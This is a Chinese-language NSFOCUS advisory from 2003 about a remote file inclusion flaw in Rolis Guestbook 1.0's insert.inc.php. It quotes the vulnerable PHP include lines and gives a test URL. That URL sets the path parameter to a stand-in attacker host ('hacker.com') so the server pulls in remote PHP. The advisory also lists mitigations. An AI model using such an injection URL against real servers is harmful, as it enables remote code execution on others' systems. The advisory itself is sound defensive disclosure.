首页 -> 安全研究

安全研究

安全漏洞
Koch Roland Rolis Guestbook $path远程文件包含漏洞

发布日期:2003-11-17
更新日期:2003-11-21

受影响系统:
Koch Roland Rolis Guestbook 1.0
描述:
BUGTRAQ  ID: 9054

Rolis Guestbook是一款基于WEB的留言簿。

Rolis Guestbook没有充分过滤用户提交的URI参数,远程攻击者可以利用这个漏洞包含远程服务器上的恶意文件,以WEB进程权限执行任意代码。

问题存在于insert.inc.php文件中:

<?php
  include ($path . "data.inc.php");
  include ($path . "header.inc.php");
  include($path . "connection_data.inc.php");
  [ skip ]

由于对用户提交的$path参数缺少充分过滤,如果指定远程服务器上的恶意文件作为包含文件,可导致以WEB进程权限执行任意PHP代码。

<*来源:RusH security team
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106908887230737&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

RusH security team 提供了如下测试方法:

www.site.com/rolis_book_path/insert.inc.php?path=http://hacker.com/

远程服务器上文件为:

http://hacker.com/data.inc.php
http://hacker.com/header.inc.php
http://hacker.com/connection_data.inc.php

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 编辑insert.inc.php文件:
> <?php
> include ("path.inc.php"); <-- 插入此行
> include ($path . "data.inc.php");
> ...

或者修改php.ini配置文件,关闭'allow_url_fopen'和'register_globals'选项。

厂商补丁:

Koch Roland
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.roli.at

浏览次数:2807
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障